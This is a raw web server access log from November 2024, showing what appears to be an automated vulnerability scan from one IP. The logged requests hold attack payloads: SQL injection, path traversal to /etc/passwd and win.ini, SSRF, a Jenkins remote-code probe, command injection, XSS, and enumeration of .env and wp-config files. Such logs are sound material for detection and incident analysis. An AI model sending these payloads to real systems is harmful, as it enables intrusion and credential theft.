195.164.49.69 - - [18/Nov/2024:22:05:18 +0000] GET /snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:05:19 +0000] GET /download?type=files&filename=../../../../../../../../etc/passwd HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:05:21 +0000] GET /?host=http://0177.0.0.1/server-status HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:05:23 +0000] GET /install HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:22:05:25 +0000] GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd HTTP/1.1 404 1172
195.164.49.69 - - [18/Nov/2024:22:05:27 +0000] GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:05:29 +0000] GET /ui/login/register HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:22:05:31 +0000] GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1 404 1207
195.164.49.69 - - [18/Nov/2024:22:05:33 +0000] GET /manage.py HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:05:35 +0000] GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type&e HTTP/1.1 404 1182
195.164.49.69 - - [18/Nov/2024:22:05:37 +0000] GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:22:05:39 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:05:41 +0000] GET /lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:05:43 +0000] POST /index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910%27)+OR+6100%3d6100%23%26type%3d HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:05:45 +0000] GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:05:47 +0000] GET /umbraco/management/api/v1/server/status HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:22:05:49 +0000] GET /settings.py HTTP/1.1 404 1085
83.212.98.101 - - [18/Nov/2024:22:05:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:05:51 +0000] GET /assets/elFinder-2.1.9/elfinder.html HTTP/1.1 404 1117
195.164.49.69 - - [18/Nov/2024:22:05:53 +0000] GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:05:55 +0000] GET /app/settings.py HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:22:05:57 +0000] GET /assets/elFinder/elfinder.html HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:22:05:59 +0000] GET /django/settings.py HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:06:01 +0000] GET /backend/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:06:03 +0000] GET /settings/settings.py HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:06:05 +0000] GET /elfinder/elfinder-cke.html HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:06:07 +0000] GET /web/settings/settings.py HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:06:09 +0000] GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:22:06:12 +0000] GET /uploads/assets/backend/elfinder/elfinder.html HTTP/1.1 404 1135
195.164.49.69 - - [18/Nov/2024:22:06:14 +0000] GET /uploads/elfinder/elfinder-cke.html HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:22:06:20 +0000] PUT /cgi-bin/48sk9C.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:06:23 +0000] POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:06:26 +0000] POST /index.php/User/doLogin HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:06:28 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:06:30 +0000] POST /openam/json/realms/root/authenticate HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:06:33 +0000] GET /user/login HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:06:35 +0000] POST /magmi/web/magmi_saveprofile.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:22:06:36 +0000] POST /api/external/7.0/system.System.get_infos HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:06:40 +0000] POST /dashboard/uploadID.php HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:22:06:41 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:06:46 +0000] GET /backupsettings.dat HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:06:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:06:48 +0000] GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http%3A%2F%2fsdc.iopan.pl:80%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:22:06:50 +0000] POST /api/users HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:06:51 +0000] PUT /api/v2/simulation HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:07:01 +0000] GET /cpanel.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /admin.php HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /php-info.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /php_info.php HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:07:02 +0000] GET /phpinfo.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:07:03 +0000] GET /info.php HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:07:03 +0000] GET /adminer.php HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:07:03 +0000] GET /xmlrpc.php HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:07:03 +0000] GET /bin/cron.php HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:07:03 +0000] GET /cache/index.tpl.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:07:05 +0000] POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:22:07:07 +0000] GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:07:12 +0000] GET /chaosblade?cmd=$(id) HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:07:24 +0000] GET /cgi-bin/48sk9C.txt HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:07:28 +0000] GET /2p2cOZFdYeImNjlLxC0pR0BQtNA.php%5Cx0A HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:07:32 +0000] POST /ajax/calendar.php HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:07:35 +0000] POST /api/json/session/signin HTTP/1.1 404 1109
83.212.98.101 - - [18/Nov/2024:22:07:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:07:44 +0000] POST /magmi/web/magmi_run.php HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:07:46 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:07:48 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:07:52 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:07:55 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:07:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:07:57 +0000] POST /logIn HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:22:08:00 +0000] POST /api/v1/users/signin HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:22:08:04 +0000] GET /api/proxy/tcp HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:08:06 +0000] POST /res/j_security_check HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:22:08:08 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:12 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:13 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:14 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:24 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:08:58 +0000] GET /api/whoami HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:09:00 +0000] GET /admin/default/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:09:02 +0000] GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:22:09:02 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:09:05 +0000] POST /authorize HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:09:06 +0000] POST /authorize HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:09:08 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:09:09 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:09:10 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:09:10 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:09:10 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:09:10 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:09:10 +0000] GET /.env.sdc HTTP/1.1 404 1082
- - - [18/Nov/2024:22:09:52 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:09:54 +0000] PUT /testing-put.txt HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:22:09:59 +0000] GET /console/index.html HTTP/1.1 404 1096
77.87.163.227 - - [18/Nov/2024:22:09:59 +0000] GET /ReplicationManager/api/api_v1/status HTTP/1.1 200 137
195.164.49.69 - - [18/Nov/2024:22:10:01 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:10:04 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:10:05 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:22:10:06 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:22:10:07 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:10:07 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:22:10:45 +0000] GET /magmi/web/info.php HTTP/1.1 404 1100
83.212.98.101 - - [18/Nov/2024:22:10:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:22:11:09 +0000] GET /../../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:09 +0000] GET /../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:09 +0000] GET /../../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:09 +0000] GET /../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:10 +0000] GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:22:11:10 +0000] GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:22:11:10 +0000] GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1137
195.164.49.69 - - [18/Nov/2024:22:11:11 +0000] GET /../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:11 +0000] GET /../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:11 +0000] GET /WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [18/Nov/2024:22:11:12 +0000] GET /.//WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [18/Nov/2024:22:11:12 +0000] GET /%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:22:11:12 +0000] GET /../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:15 +0000] GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:22:11:17 +0000] GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:22:11:19 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:11:21 +0000] GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:11:23 +0000] GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:11:25 +0000] GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:11:28 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:11:30 +0000] GET /user/requireLogin HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:22:11:32 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:11:33 +0000] GET /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(99999)+union+all+select+1,2,(md5(999999999)),4 HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:22:11:35 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:11:35 +0000] GET /jmx-console/ HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:22:11:40 +0000] POST /module/retrieve_pwd/header.inc.php HTTP/1.1 404 1116
- - - [18/Nov/2024:22:11:42 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:22:11:44 +0000] GET null HTTP/1.1 400 2308
- - - [18/Nov/2024:22:11:44 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:11:50 +0000] POST /wp-admin/admin-post.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:11:52 +0000] GET /_wpeprivate/config.json HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:22:11:53 +0000] GET /wp-config.php HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:11:53 +0000] GET /.wp-config.php.swp HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config-sample.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.inc HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.old HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.txt HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.php.txt HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.php.bak HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.php.BAK HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.php.old HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:54 +0000] GET /wp-config.php.OLD HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.dist HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.inc HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.swp HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.html HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config-backup.txt HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.save HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php.SAVE HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php~ HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:22:11:55 +0000] GET /wp-config.php-backup HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:11:56 +0000] GET /wp-config.php.orig HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:56 +0000] GET /wp-config.php_orig HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:22:11:56 +0000] GET /wp-config.php.original HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:22:11:56 +0000] GET /wp-config.backup HTTP/1.1 404 1090
83.212.98.101 - - [18/Nov/2024:22:12:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:22:12:42 +0000] GET /wp-content/plugins/knews/readme.txt HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:22:12:43 +0000] GET /testing-put.txt HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:22:12:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:22:12:47 +0000] GET /config/fillbacksettingedit.php?DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ HTTP/1.1 404 1108
- - - [18/Nov/2024:22:12:52 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:22:12:54 +0000] GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:22:12:56 +0000] GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:22:12:58 +0000] GET /../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:22:13:00 +0000] GET /install/install.php HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:22:13:03 +0000] GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:22:13:04 +0000] GET /phpwiki/index.php/passwd HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:22:13:06 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:22:13:07 +0000] GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:22:13:11 +0000] GET /admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:22:13:13 +0000] GET /index.php/install/ HTTP/1.1 404 1100
